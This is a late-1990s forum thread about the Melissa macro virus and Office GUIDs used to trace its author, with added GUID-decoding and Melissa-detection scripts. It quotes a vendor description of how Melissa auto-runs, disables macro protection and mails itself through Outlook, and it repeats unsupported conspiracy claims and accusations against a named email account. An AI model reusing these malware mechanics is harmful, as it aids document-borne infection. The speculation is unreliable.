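The GUID quoted in the post above can be decoded by the DCE/RFC 4122 version-1 layout. This Python script is an added example, not code from the thread: it pulls out the node field the post identifies as the MAC, checks whether that node looks like a genuine unicast hardware address, and, going beyond the post, recovers the 60-bit creation timestamp the same GUID carries. The v4 GUID used for contrast is a constructed sample value.

```python
"""Decode what a version-1 GUID, as embedded by Office 97, reveals about its origin.

Added example, not code from the original thread. A v1 GUID carries a
48-bit node (normally the Ethernet MAC) and a 60-bit timestamp; a v4
(random) GUID carries neither, so the same parser shows both cases.
"""
import re
from datetime import datetime, timedelta, timezone

# Epoch of the v1 timestamp: 100 ns intervals since 1582-10-15 (Gregorian reform).
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)

_GUID_RE = re.compile(
    r"^\{?([0-9a-fA-F]{8})-([0-9a-fA-F]{4})-([0-9a-fA-F]{4})-"
    r"([0-9a-fA-F]{4})-([0-9a-fA-F]{12})\}?$"
)


def decode_guid(text):
    """Return a dict describing what the GUID string reveals about its generator."""
    m = _GUID_RE.match(text.strip())
    if not m:
        raise ValueError("not a GUID: %r" % text)
    time_low, time_mid, time_hi_ver, clock_seq, node = (int(g, 16) for g in m.groups())

    version = time_hi_ver >> 12
    info = {"version": version, "node_is_mac": False, "mac": None, "created": None}
    if version != 1:
        # Random (v4) or name-based (v3/v5) GUIDs embed no node address and no clock.
        return info

    # Node field: a node that is not a real IEEE 802 address is supposed to have
    # the multicast bit (LSB of the first octet) set, so a clear bit means the
    # generator most likely embedded a genuine unicast hardware address.
    first_octet = node >> 40
    info["mac"] = ":".join("%02X" % ((node >> (8 * i)) & 0xFF) for i in range(5, -1, -1))
    info["node_is_mac"] = (first_octet & 0x01) == 0

    # Timestamp: 60 bits spread over time_low, time_mid and the low 12 bits of
    # time_hi_and_version, counted in 100 ns ticks from the Gregorian epoch.
    ticks = ((time_hi_ver & 0x0FFF) << 48) | (time_mid << 32) | time_low
    info["created"] = GREGORIAN_EPOCH + timedelta(microseconds=ticks // 10)
    # Clock sequence: low 14 bits; the top two bits are the variant marker.
    info["clock_seq"] = clock_seq & 0x3FFF
    return info


# GUID quoted in the post above (PowerPoint "Project Overview" template).
OFFICE_GUID = "{DB2F2831-22EE-11D0-BC57-00805F883DE4}"
# Constructed v4 GUID for contrast: a sample value, not taken from the page.
RANDOM_GUID = "{A1B2C3D4-E5F6-4A7B-8C9D-0E1F2A3B4C5D}"

if __name__ == "__main__":
    for g in (OFFICE_GUID, RANDOM_GUID):
        d = decode_guid(g)
        if d["node_is_mac"]:
            print("%s: v%d, node %s looks like a real MAC, created %s UTC"
                  % (g, d["version"], d["mac"], d["created"].strftime("%Y-%m-%d %H:%M:%S")))
        else:
            print("%s: v%d, no hardware address or clock recoverable" % (g, d["version"]))
```

Both fields are plain text in the file, so, as the thread notes elsewhere, they are evidence of which machine probably generated the document, not proof: anyone with a hex editor can overwrite them.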
His AOL profile is full of valid information (he's a civil engineer in Lynnwood, WA and owns an AST).
Whose brilliant idea was that! Oh well. Anyone dumb enough to post a 'virus' with their own e-mail address should get whatever they throw at them. Social darwinism. :)
There is no way that he is the real author. Virus authors do not fill their profiles with valid info. The poor man was spoofed. 5cr1P7 k1DD13z put things like '31337357 h4x0R d00d' in their profiles.
Damned irresponsible reporting's what that is.
What's really laughable is this patch. It simply changes Word so that when you open a document with a macro, Word says "This document contains macros. Would you like to disable them?" It gives no clue what effect these macros may have. This is a fix?
I can hardly wait until Microsoft uses this to "justify" recording computer IDs, as well as having GUIDs put into their Office documents.
Methinks I'll go convert all my old Office documents into RTF.
if i were the type of person to build a virus, i'd make a point of embedding Bill Gates' GUID in it.
that'd be an interesting research question. what is Bill's GUID?
Then we can attach it to every Word document that we see.
Shoot, I've already got my career chip. When I found out that I was doomed to be a Visual Basic programmer I cried myself to sleep. Now I've got to wait until 2008 for the invention of the suicide booth...
Hmmmm, maybe there will be an opening in Microsoft's macro virus development division pretty soon. Shoot after the DOJ breakup, I could make a killing in stock options when they spin off it off as a new company.
Thought Patterns of Everyone in my office:
Of course I want to enable macros from this unknown recipient... enabling good... macro virus...? That's not related to enabling macros is it... what they spread through email...? I'd better email everyone and warn them that I've got this virus.
uh oh, there's a macro virus running around... Of course I want to enable macros...
Conscience is the inner voice which warns us that someone may be looking.
-- H. L. Mencken
I'd have to agree, the poor bastard that owns SkyRoket@aol.com is toast. Whose brilliant idea was that! Oh well. Anyone dumb enough to post a 'virus' with their own e-mail address should get whatever they throw at them. Social darwinism. :)
Still M$ getting off pretty easy on this one. That sux. God forbid they focus on patching the gaping hole this walked through! Oh well. And to think there were no anti-M$ messages in the thing. What a waste. Something as simple as 'Aren't you glad your system is one big fucking lump of code?' would do.
microsoft *is* the car manufacturer making the memory hogging monsters for more than a decade.
I agree with what you say in general principle, but it does make me very uneasy. It's the first step down the proverbial slippery slope.
It's a very small step, IMHO, from poor design to bugs in a program. They're really just bugs of a different kind (a design bug vs. an implementation bug).
And if a software writer can be sued because of bugs in their program...?
It's one thing if they knowingly left bugs in their program that could be exploited without telling anyone, but quite another to prosecute/sue people simply for having bugs in a distributed program, whether they sell it or not. (If this isn't what you're getting at, I apologize; it just sounds like it to me).
I do not like micros~1, for many reasons. However, this is not one of them. It scares the $#!+ out of me to think that someone could bring a lawsuit against me simply because of some bugs that happened to be in my program that I didn't catch. After all, it is extremely difficult, even impossible, to be sure you have eliminated all bugs in a program. Of course, I will do my best to fix the ones I find, but some will remain, undetected by me. And some of those just may be serious; I won't deny that possibility.
No, I tend to think that limited liability for programmers is a good thing...
--
- Sean
It's a fine line between trolling and karma-whoring... and I think I just crossed it.
- Sean
Maybe someone will figure that if they make an example of one cracker, others will be "scared straight".
Sounds suspiciously like what they tried with Kevin Mitnick, to me...
No, yet another proof of workplaces dictating what their employees use.
I use office and outlook (ok, I'll use lowercase). Not because they're good. Because I'm told to.
There are those of us forced to use Exchange/Outlook at work, and I found 15 of those bloody emails in my box yesterday morning.
I never thought I'd be wishing we didn't convert from CC:Mail. (see, Outlook was a major improvement..)
Remember how, Outlook only SPREADS the virus, anybody running Word/Office with ANY Email program can get infected and spread the virus manually.
Go ahead and use Eudora, but if you have Word/Office, you still get infected if you open the doc.
Do a little more reading first..
If you open the doc, it infects the normal.dot document of Office/Word, and forwards it to 50 people in your address book w/ your name from the registry.
If you have another email program, and you open the document that you received, you are still infected, but you don't automatically spread it. BUT, any document you open and save from then on is infected, and any of them you forward to others will infect them. Plus, if they have Outlook, they start the automatic propagation again.
Newsgroups tend to generate intensive grudges.
Sheesh, evil *and* a jerk. -- Jade
They make this "Virus" (Why I quoted: because I don't call these types of scripts a real virus) to be sooo dangerous.. It's just that it's annoying, like every Macro 'Virus'.. OutLook is terrible.. I only use it when I really need it.. But I use mostly the mail package in Netscape....
I ate my tag line.
-=Ellis (D)25=-
Well, any positive benefit from that would tend to be outweighed by the outages and downtime caused by the virus... a virus that only affects someone running Microsoft Windows, Word and Outlook. (Though maybe if you have Eudora or something and open the attachment, your Word can still get infected; it just won't spread automatically like it will with Outlook.)
--
Do I look like I speak for my employer?
This just proves that most users aren't even aware that there are applications other than outlook and office (lowercase, please). If users had made a choice and used whatever mail client they tried, the Melissa Virus would not have spread so quickly.
The spread of the Melissa virus is generating *much* more publicity in mainstream media channels than the GUID issue. Sure, if the GUID helps find the perpetrator, this will be publicized, but much of the public won't understand it. What they will understand is that Melissa (and similar viri) continue to spread via their Microsoft software. The negative PR would far outweigh the positive.
This will only work once. Now that this is so well publicized, the next time someone creates a Word virus, they'll strip out the GUID. This doesn't really solve their security problems.
A minor point: macro virus protection IS, in fact, a default option in Office 97: you have to give the drones at M$ the credit for that. Even if it looks like Macro Viruses originated from a disgruntled MS Employee. . . .
Ok, I might just be a prejudiced SOB, but I'm always shocked when someone is able to use a MS app to do anything useful.
I would like to make some points about Melissa. 1) As far as viruses go, Melissa was lame. Anybody remember the Manilow Virus? I was hit by that, and I laughed until I found out that my HD was wiped clean. Ouch! Now that was a malicious virus. But Melissa just sends out e-mail messages to people in your address book, 50 for the sake of argument. I am a sysadmin for over 500 windows users, and I would bet you 4 of them know that they have an address book much less use it. And if you never open the attachment, nothing happens. And who opens attached files from people they don't know? I sure as heck don't. Anyone who actually opened Melissa would have most likely opened the darn thing if it was called "I'll screw up your computer.exe"
The more dangerous thing that is happening is that we are now creating a new "Super Cracker" here that will be basking in the attention of his script kiddie peers. And worst of all he's a lamer. He can't even write a decent virus. (Attention /.ers, I do of course realize that there will be a Jon Katz article tomorrow about his trials with the Melissa "Super Virus" that threatened to ruin X-mas by making you read doofy e-mails that resemble porn spam, causing you to overcook your turkey right on the big day.)
Where was I? Ahhh... Yes! So, this lame VB scripter writes a lame VB virus, and turns it into an alt.sex ually transmitted disease (forgive the pun) and gets caught by some lame GUID. The fact is that he probably wanted to get caught, so that he could gloat about it. The first question that he asked his attorney was probably this, "So will I get on 20/20?"
I hate to be sue happy but.... If M$ thinks they can use their ID's then they deserve another lawsuit. Sue for slander / invasion of privacy.
Tip: Anyone that created the virus should toss anything M$ they own and install Linux on all of their machines.
When Melissa was released, no virus scanners could detect it. Sure we could just strip all attachments, but the upper management tends to get mad at stuff like that :-)
It's interesting that other collaboration/e-mail packages such as Lotus Notes and Eudora are unaffected by these problems....
Um, well, it won't pull names from an Eudora client, but it will still happily start outlook and see what it can find in there. And that's just based on what the writer wanted to target (there ARE more outlook clients installed than Eudora, after all)
Why are M$ products *designed* to be so blatantly insecure? I'm sure the basic principles of program security have been around for ages... what motivates M$ to deliberately ignore them?
Here we agree. They claim it's to allow third-party developers a chance to extend the office suite, I think it kinda blows :-)
It's not coincidence that issues like the GUID are troubling us now... these technologies were created for specific purposes... and look how easy it was for two non-M$ people to track down the creator of the Melissa docs.
Conspiracy theories, my ass. More than enough evidence to go on here.
Back to the debate of whether PGP signing is useful if it's not mandatory. Don't wanna go there...
Can anyone remember a short while (couple of years) when MS-DOS 6.x came out, factory-equipped with Screaming Fist ? Am I the only one that sees a pattern of product release / virus / product release / virus from the dark side ? They might not be the ones responsible for the virus, but where I come from, the guy that sells the gun to the guy that shoots the other guy is about as guilty as the guy who actually shot the other guy. (Ok this is confusing.)
Sun Tzu must have been running Linux...
- Hold out baits to entice the enemy. Feign disorder, and crush him. (Sun Tzu, The art of war)
Marriage is considered capital punishment for the theft of a goat in some third world countries...
Can you spell "user-space"? Unless you run emacs as root (running anything as root unless explicitly necessary is stupid anyways), the only damage Lisp code could do is to your own stuff... Not bring the whole mail server down to its knees (Sendmail is tougher than Exchange, we now have proof.).
"If they find the writer of this virus, I think the writer of this virus should be fined the cost that it takes to remove the virus from all infected computers, plus the associated cost for lost work, plus they should be jailed for life."
i think this guy has a bit of a chip on his shoulder.
of course people wouldn't be having these problems if they were running linux:)
hmmm.... The timing of these incidents seems a little too coincidental. "If it wasn't for those GUID's secretly embedded in MS Office documents, we may have never tracked down this evil perpetrator", says Joe Researcher, on his way to the bank to cash in his check from billg. "Thank goodness for GUID's!"
or maybe i've had too much coffee this morning - my paranoia settings could need some recalibration.
As a general, wide-sweeping software design idea, I think scriptable programs are a Good Thing. This pretty well necessitates "executable documents" assuming that you want to carry macros back and forth. The problem is with invisible, automatically-executing macros (or invisible, automatically-executing code in general). Adding more functionality to a program (a la Emacs) really helps in customization, and is a good design choice. The problems of word macros are the same design flaws that lead to insecure operating systems and programming languages.
"Whatever happened to fair use?"
-- Duff-Man
It's all fine and dandy that they traced the stupid virus, but it really sucks how they did it. Now we are gonna get all sorts of people screaming and yelling that GUID's are an excellent idea.
So is it possible for the creator of the virus to sue Microsoft for invasion of privacy?
--
Once you unwrap the lollipop of mediocrity, you'll be sucking on it forever. -- Matt Jannusch
Making it a crime to "create a virus" is very bad idea.
Releasing a virus, esp. with the intent of causing harm is a different story, however...
The difference here is that big tobacco spent lots of time, money and marketing know-how to figure out how to best sell poison to people.
It's as if a software company went out and marketed an insecure, buggy operating system as an "enterprise solution", all the while knowing that it exposed users to all sorts of risks...
perhaps we've got a lawsuit here ;)
5-10 years and $350,000? What the f*ck is that? Maybe Microsoft should be slapped with a class action lawsuit for setting up the infrastructure that allowed this virus to spread.
That's like saying Ford should get sued when there's a hit-and-run, or HP getting done when I run out of paper in my printer and miss a deadline, or tobacco manufacturers getting sued when someone dies from smoking Marlboros.
Oh bugger. I just disproved my point. I'll shut up now. =)
If Ford (for example) sells you a car without door locks, or an alarm, or an engine immobiliser, etc and it gets nicked, who would you blame? Who would "the public" blame?
My Aus$0.03. (US$0.02)-- open source? sounds like the real book --
Having read the article I can't help wondering how hard the original virus writer would find it to change the GUID in his original file. If someone can extract the GUID from files on a website what is to stop the original author creating the original infected document and then changing its GUID to that belonging to a different instance of Office. And given the prevalence of AOL free membership CD's and the ease with which a poster to USENET can fake their address is it any wonder the original source appears to be an AOL (l)user.
Kithran
I don't care about that stupid virus as much as I care about what M$ has done to invade peoples' lives. M$ is the criminal here, not the punk who will take the fall.
The first thing I thought when I saw all the press about the melissa "virus" (yes .. i know) is that perhaps this was released as publicity by someone .. maybe Norton or CA.
.. i don't know .. usefulness?
.. and remembering the controversy over GUID's quite recently .. maybe it wasn't Norton or CA who created it, but Microsoft itself? Now of course I know that MS is not stupid enough to release this /themselves/ , but I'm QUITE SURE they wouldn't have a problem allocating a "black budget" for these types of things to be funded.
.. its like a wave .. anyway) :
It is a WELL KNOWN FACT that antivirus product makers have historically released viruses into the wild to "boost" their products
Well I had that thought the other day. And now today, reading that they supposedly "tracked" the creator
IN FACT.. most people probably don't remember unless reminded of this (and this is what pisses me off about MS, they have done SO MANY EVIL THINGS, but they space them out just far enough to where people don't remember one from the next, so our anger can never peak
Remember a while ago it was uncovered that Microsoft had made plans with their PR agency to create a false grassroots support campaign for them? They PAID OFF national, prestigious journalists to write articles supporting them. They paid prominent people to write letters to the editor of newspapers. Fortunately this was uncovered in time to embarrass them and to prevent them from unveiling this plan on a large scale. But those of you who are skeptical that this is a conspiracy.. please remember that MICROS~1 has demonstrated in the past that this type of thing is not below them.
Additionally, who would better think to exploit the vbscript in word 97 other than a Microsoft engineer? Don't be foolish, their engineers are QUITE intelligent, it's just that management beats them down. They have HUNDREDS of world-class programmers working for them, but unfortunately they are not allowed to do "what's right," they have to do what management says (cf. Win 3.1 compatibility in Windows 95 [and other 16 bit code]). I can see a microsoft engineer coming up with this idea.
It all in all smells quite fishy to me. We will see how it pans out, but my prediction is that no one will ever be caught
An ethernet card created the file?
There's no reason to assume that whoever created the 'virus' even had an ethernet card. Even if he/she did, there's no real relation between the Ethernet GUID and the word GUID here. And as far as I know, no non-network application software currently looks at ethernet IDs.
I couldn't agree more, I just think that the "executable" part of documents should be about document-contained data. I mean, a script inside a document should only be able to look at and change data contained in the original document.
The problem is that VB and Active X give you too much power from inside a document, and I don't think requiring a signature is enough, since most people (dumb people, but people) simply accept whatever dialog pops into their faces.
[]'s Victor Bogado da Silva Lins
^[:wq
Mailissa IS stupid. It's a non-virus that (at worst) can cause a DOS against inadequate hardware running an inadequate OS running an inadequate mailserver program. For this to work, you must also have many clients running M$ Office.
In short... who cares!!! Is it the "Virus That Ate MCI" or the new ADM worm for Linux? No, it's a stupid Visual Basic macro that's the latest in a series of thousands.
Is Rob a nasty hideous censor for calling it stupid? Duh! If you run M$ exchange with M$ office clients, you are subject to macro "viruses". This is extremely old news. Sign me up for a double-yawn!
Like this is the first DOS against Exchange, or the first annoying macro "virus" (Faithful Bugtraq readers may officially chortle here). Get a life! The only reason that this macro is being talked about is that some loser at CNN picked it as a career move.
Move on!
--Sync
Very true. MS actually owns the RTF spec and you can search far and wide for published specs on this language and you won't find much. MS has a white paper on the subject but it hasn't been updated for YEARS. I did a project which used RTF and recall talking to MS support about RTF issues. They don't even support this standard anymore. I was given the white paper and brushed off.
> The problem is that VB and Active X give you too much power from inside a document, and I don't think requiring a signature is enough, since most people (dumb people, but people) simply accept whatever dialog pops into their faces.
No kidding--one job I did was for an office where people blithely clicked "OK" without ever reading what was in the dialog ("Do you want to delete all records? OK!"). It took a bit of social engineering to get around this--in the end we designed dialog boxes that required a typewritten reply to perform catastrophic functions (like deleting records etc.) "You are going to delete all the records. Type in the third word of the second sentence in this box to confirm that you want to do this." While this would have driven me nuts if I had to USE this application it was the only way to keep them from shooting themselves in the foot on a regular basis (and then calling me for tech support afterwards!).
-----------------------
To understand recursion, one must first understand recursion.
This is absolutely true. The GUID, as I understand it, is built at install time and written to the registry. It will not be re-written when a network card is changed. Also, as is often true in the corporate I.S. world, a bunch of machines can be 'cloned' via Ghost or a similar utility from a master image. These machines all inherit the GUID present in the master image. This is a problem I've seen first-hand.
Ah, perhaps I should have specified more what I meant by "executable". I don't mean scripting stuff (though I do, indeed, feel that JS is evil). I think scripting is just fine, when all it does is affect the presentation, layout, and effects of a document. But when a document executes code that is independent of the document (like a mail merge that goes and gets addresses from Outlook), it's no longer a document - it's a program.
And just like you shouldn't run any program someone emails you, you shouldn't "run" a document someone sends you. I wouldn't worry about an HTML document, because it doesn't fall under my definition of executable (plus I keep JS turned off).
The problem with M$'s documents is that they just don't put limits on it. A document should be in its own little sandbox and shouldn't leave it. If you want to do mail merges and such, add that module into outlook or a separate executable - don't wedge it into the Word format!
--
Jason Eric Pierce
Actually, we don't (in the States). An unauthorized search and seizure is one of the easiest ways of getting evidence thrown out in a U.S. court.
--
Jason Eric Pierce
Interesting opinion. I think it's pretty interesting, considering it points out how M$'s shoddy products lead to security holes. Granted, the
Executable documents are just plain wrong.
--
Jason Eric Pierce
> Sorry - the e-mail address is skyroket@aol.com (without the 'c' in 'rocket').
Man, if that's the case, I'd doubly hate to be skyrocket@aol.com tonight.
Just doing a quick search on dejanews, I found about 50 posts by skyroket@aol.com...but they were all from 1997, and all on sex newsgroups. It looks like he was a spammer. Most likely the virus' author was a regular on one of those newsgroups and has an aversion towards spammers (who doesn't?)
Spreading a virus now because of some bits of spam received two years ago? That sounds like a highly intensive grudge to me.
Based on what this guy is apparently able to code he's not your run-of-the-mill hacker. So why does he insist on working on that unstable platform?
D. Keith Higgs
CWRU. Kelvin Smith Library
My office has been taken over by iPod people.
Melissa preys upon MICROSOFT Outlook and maybe other MICROSOFT technologies and could easily have been made somewhat deadlier. Why would Microsoft publicise the risks of using its over elaborate technology?
Even though Phar Lap established that the MAC address is part of the GUID, you can't just take a MAC address and go find it on the Internet, at least not that I know of.
ZDNet must have had some other tip such as an IP address or an informant that led them to the source. If forced to wager, my money would be on "informant."
Also note that even though MS has changed the registration process, this still leaves the same GUID in your Word documents. It's just not sent to MS anymore.
>> it shows how they traced the GUID
Again, not to be picky, but it could not have been the GUID that led ZDNet to the original. Yes, it was used to compare MAC addresses, but there was certainly something else that helped them find the source.
Note, too, that the article said only that the MAC addresses matched. It did not say that the GUIDs matched. I'd think it would be easier to forge the MAC address portion than the entire GUID.
Maybe it's just one hacker setting up another hacker, then blowing the whistle. Just speculatin'
Sorry for my loose use of the term "spec" and any resulting confusion. As I'm all too painfully aware, Word documents are not an open spec. But some info about them is published.
Anyway, the existence of the GUID is not a new discovery, while the existence of the embedded MAC address is.
Since it was the MAC address portion that was used to correlate the documents, I guess it is accurate to say that it came about as a result of Phar Lap's recent research.
It's still a sloppy article by ZDNet. I mean, how the *&%$ did they know where to look? What led them to that particular web site?
First, the existence of the GUID in Word documents was not "recently discovered." It's part of the spec, and it's been known about for a long time.
What was discovered is that the GUID is transmitted to MS during the registration process.
Of course, the likelihood that the macro writer registered his copy of Windows using his real name and address is probably.... zero. So it's doubtful that MS has any record of that GUID.
Which begs the question... What is the basis for ZDNet's claim that the GUID was used to "track" the document back to its creator?
More likely, they used the NNTP headers to get some hints about where to look, and when THAT trail led somewhere, they compared GUIDs and thus established an apparent connection.
The real issue is not the recently discovered transmission of the GUID to MS during registration, it's the existence of the GUID itself that can reveal more information than you realize. It's not "big brother," it's just bad design. And sloppy reporting.
http://www.root.org/melissa_virus.txt- Mar-99/melissa.macro.virus.txt
http://www.genocide2600.com/~tattooman/exploits
Subject:
Important Message From
Body:
Here is that document you asked for
... don't show anyone else ;-)
a bit obvious, don't you think.
> Virus writers and crackers need to be given some serious jail time and fines.
Agreed. Virus writers are like people shouting fire in a crowded theatre. They probably don't intend to really hurt anyone, but they know they are "playing with fire," so to speak. So if their actions hurt others they should be held accountable.
That said, I'd rather let the virus writer get away with it than have every Office document carry a unique ID traceable to the author. Americans are too freely giving up their privacy. Time to fight back.
Questionable particularly in the light of the "most widespread PC virus attack ever."
Here at CNET the decision was suddenly made this week to unilaterally roll out Outlook to all employees (Eudora was standard until now). What could the advantage of that change possibly be? Eudora is relatively small, reliable, and featureful; Outlook is enormous and crash-prone.
Backroom deal with Microsoft?
I find it interesting that so many people assume that GUIDs were invented by Microsoft with evil intent, when in fact Microsoft was reusing an "open standard" for generating unique 128-bit identification numbers from RPC for DCE (Unix) -- with minor mods to handle the larger fraction of PCs w/o network cards. This decision was made over seven years ago for OLE2. This is also used by CORBA.
The reason a GUID is in a Word document is because Microsoft treats documents as objects (generally considered a good thing), and objects carry identifiers which are GUIDs. Most other distributed object systems do the same thing.
The main issue is that Microsoft distributed GUIDs more pervasively than most, since their software is so popular.
How do I know this? I made this design decision for using GUIDs.
Are the GNOME guys thinking about this? Don't they use CORBA? Sometimes it's easy to take your infrastructure for granted -- like I imagine the Word guys did when they used COM/OLE, and ended up with this GUID/privacy problem.
[Straight after the discovery of the ID's Microsoft promised us that they'd erase the databases immediately. If they're able to use these id's it means that they haven't erased the bases. They lied AGAIN....]
Take a valium and stick to watching the X-Files. They did not track this with the Microsoft registration database -- it was done more simply by comparing the GUIDs in documents.
Geez.
hence surf with Linux... what .exe viruses can do to us :-) macroviruses likewise.
God did not appoint us to suffer wrath but to receive salvation through our Lord Jesus Christ --1Thes5:9
-segfault
Go ahead and let them install outlook and then ignore it and use whatever imap reader you want - I use netscape and what IS doesn't know won't hurt them.
The whole macro virus shows the bad things that can happen when one company is able to have its software running at all the levels - if you take the MS out of any part the whole thing breaks. I believe Cliff Stoll made a comment relating to this about not letting any one vendor dominate, as a security flaw in that vendor's product could compromise everyone.
I hope companies (like mine) that now have their email turned off re-think how great exchange, word, and the whole MS package is. I wonder what this is costing in terms of lost work etc?
As for the question posed in the subject, I was under the impression that a virus ran on one single machine and that was the end of its story. Someone had to physically put it onto your machine for it to get there and when it was done with you, that particular program was finished.
;-)
... it's a new age!
With a worm, however, the program doesn't "want" to "die" on your machine. It has the ability to transfer between machines that are connected through some sort of networking protocol.
So, in the case of Melissa, I would think that it SHOULD be called a worm for the simple fact that it transfers itself through email (TCP/IP). My only doubt lies in the fact that Central Command has also labeled it a virus.
Someone said they didn't even know what Melissa does, so below is a copy of what Central Command posted to their web site recently. BTW, if what Central Command says about Melissa is true, I can find out whether I'm infected with Melissa by using regedit.exe and Ctrl+F
-----------------------------------------------
This macro virus replicates under Word 8 and Word 9 (Office97 and Office2000), infects Word documents and templates, and sends its copies in email messages. The virus has a trigger routine, changes the system registry, and disables Word macro-virus protection.
The virus is able to spread to Office2000 (Word ver.9) documents. This possibility is based on Office's "conversion" feature. When a new Office version opens and loads documents and templates created by previous Word versions, it converts the data in the documents to the new formats. The macro programs in the files are also converted, including the virus macros. As a result the virus is able to replicate itself under Office2000.
In case the virus is run in Office2000 it performs an additional action: it disables (sets to the minimal level) the Office2000 security settings (anti-virus protection).
The virus code contains one module named "Melissa" with one auto-function in it: "Document_Open" in infected documents, or "Document_Close" in NORMAL.DOT (global macros area). The virus infects the global macros area when an infected document is opened, and spreads to other documents when they are closed. To infect documents and templates the virus copies its code line-by-line from the infected object to the victim one. In case NORMAL.DOT is being infected, the virus names its program in the module "Document_Close"; when the virus copies its code from NORMAL.DOT to a document, it names it "Document_Open". As a result the virus installs itself into the Word application at the same time an infected document is opened, and affects other documents only when they are closed.
To send its copies in email messages the virus uses Visual Basic's ability to activate other Microsoft applications and use their routines: the virus gets access to MS Outlook and calls its functions. The virus gets the addresses from the Outlook database and sends a new message to all of them. This message has the subject "Important Message From [UserName]" (UserName is variable) and the message body "Here is that document you asked for ... don't show anyone else ;-)".
The message also has an attached document (needless to say it is infected): the virus attaches the document that is being edited at the time (the active document). As a side effect of this way of spreading, the user's documents (including confidential ones) can be sent out to the Internet. The virus sends infected emails only one time. Before sending, the virus checks the system registry for its ID stamp:
HKEY_CURRENT_USER\Software\Microsoft\Office\ "Melissa?" = "... by Kwyjibo"
If this entry does not exist, the virus sends e-mails from the infected computer, and then creates this entry in the registry. Otherwise the virus skips the email routine. As a result the virus sends infected email messages only once: on subsequent attempts it finds the "Melissa?=" entry, and skips the routine.
The virus also has a trigger routine that is activated, each time the virus macros get control, if the current day of the month equals the current minute. This routine inserts the following text into the current document:
Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here.
The virus has the comments:
WORD/Melissa written by Kwyjibo
Works in both Word 2000 and Word 97
Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
Word -> Email | Word 97 Word 2000
"No one will ever use more than 640k of memory." -Bill Gates 1981
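As an added example (not from the Central Command write-up quoted above or from any poster), a mail-gateway check built from the indicators in that write-up: the fixed subject and body strings plus a Word attachment, run over constructed sample messages. The sender addresses, file names and attachment bytes are made up for the demonstration.

```python
import re
from email import message_from_string, policy
from email.message import EmailMessage

# Indicators taken from the Central Command description above.
SUBJECT_RE = re.compile(r"^\s*Important Message From\b", re.IGNORECASE)
BODY_RE = re.compile(r"Here is that document you asked for", re.IGNORECASE)
WORD_EXTENSIONS = (".doc", ".dot")


def melissa_indicators(raw_message):
    """Return the set of Melissa indicators found in an RFC 822 message string.

    Possible members: "subject", "body", "word_attachment".  The subject and
    body strings are the ones the virus writes into every message it sends;
    the attachment check catches the document it mails out (a .doc or .dot).
    """
    msg = message_from_string(raw_message, policy=policy.default)
    hits = set()
    if SUBJECT_RE.search(msg.get("Subject", "")):
        hits.add("subject")
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename() or ""
        if filename.lower().endswith(WORD_EXTENSIONS):
            hits.add("word_attachment")
        elif part.get_content_type() == "text/plain":
            if BODY_RE.search(part.get_content()):
                hits.add("body")
    return hits


def should_quarantine(raw_message):
    """Gateway rule: a Word attachment plus at least one of the fixed strings.

    Requiring the attachment keeps ordinary mail that happens to say "here is
    that document you asked for" out of quarantine, and requiring one of the
    strings keeps ordinary Word attachments flowing.
    """
    hits = melissa_indicators(raw_message)
    return "word_attachment" in hits and len(hits) >= 2


def build_sample(subject, body, attachment_name=None):
    """Build a constructed sample message (not a real capture) as raw text."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"      # constructed address
    msg["To"] = "recipient@example.invalid"     # constructed address
    msg["Subject"] = subject
    msg.set_content(body)
    if attachment_name:
        # A few bytes of the OLE2 compound-file magic number stand in for a document.
        msg.add_attachment(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",
                           maintype="application", subtype="msword",
                           filename=attachment_name)
    return msg.as_string()


# Constructed samples: one shaped like a Melissa message, one ordinary report.
INFECTED = build_sample("Important Message From Alice",
                        "Here is that document you asked for ... don't show anyone else ;-)",
                        "list.doc")
BENIGN = build_sample("Q2 report", "Draft attached, comments welcome.", "report.doc")

if __name__ == "__main__":
    for label, raw in (("infected", INFECTED), ("benign", BENIGN)):
        print(label, sorted(melissa_indicators(raw)), "quarantine:", should_quarantine(raw))
```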
was this before or after they assassinated JFK?
+&x
hear hear!
+&x
*Unnnnhh* -- Virus in Visual Basic -- *choke* *wheeze* -- Documents with executable code embedded in them -- *gasp* -- Unique identifiers embedded in documents -- *groan* -- Bad, bad ideas -- *pant* -- Can't breathe anymore -- getting dark....
Save the whales. Feed the hungry. Free the mallocs.
Great point. What's subtle, but very scary, is the use of the word "fingerprint" in the media to describe the GUID.
This creates the impression in the mind of the public that a GUID is unique like a fingerprint. Programmers who work on Microsoft systems know that GUIDs can be easily copied or faked.
I would hate for someone to snag a GUID from a COM object I wrote and embed it in a Word doc containing a virus. Convincing the FBI that it wasn't me could be a nightmare.
Geez, the more I think about this, the more it scares me!
Save the whales. Feed the hungry. Free the mallocs.
It's a pseudo-random number based partly on the unique number in the network card. I'm pretty sure the exact date/time of generation plays a part in it, as well.
:-)
Scary point -- There is an acknowledged Microsoft bug that occurs when GUIDs are generated on computers without Ethernet cards. These computers use Dial-Up Networking, which apparently generates the SAME unique identifier for everyone. It is possible that two computers without Ethernet cards could generate the same GUID.
Yeah, I sometimes program in Windows. I didn't say I like it.
Save the whales. Feed the hungry. Free the mallocs.
.. although the guy apparently has a history of spreading virii, there is no proof that it was him.. because of the publicity regarding the UIDs, anyone smart enough to engineer this type of thing would be smart enough to be able to cover their tracks..
The ZDNet article claims that the MAC address is 'proof', but any semi-literate coder would know that it's pretty simple to change a MAC address (software settable..)
All they have is circumstantial evidence, so anyone who's foolish enough to say "see the UIDs are good" is going to be proven to look the fool when he's acquitted.
If the authorities push this, I hope the guy brings a huge civil lawsuit against MS for invasion of privacy.
Doesn't matter - the info obtained in this situation was not obtained by either a 'search' or by someone acting as a law enforcement agent.
Remember, Kenneth Starr couldn't tape record Monica Lewinsky's phone conversations w/o her consent or a warrant, but Linda Tripp could as she is a private citizen and not subjected to the same restrictions as law enforcement.
Not to mention that a search, or a phone tap, implies a breach of someone's assumed private communications - you have a reason to believe that things you say privately over your phone line, or in a letter, remain private. Anything you publically state (or post) does not carry any kind of reasonable expectation of privacy.
Laws regarding recording phone conversations vary from state to state. In some states what Tripp did was perfectly legal ... in others, completely illegal and inadmissible by Starr. I guess he was lucky it was in DC. *grin*
Actually, what Tripp did (taping of a 2nd party w/o their consent) is illegal (AFAIK) under the law of DC (or wherever it actually happened), though she was not charged with any crime for this.
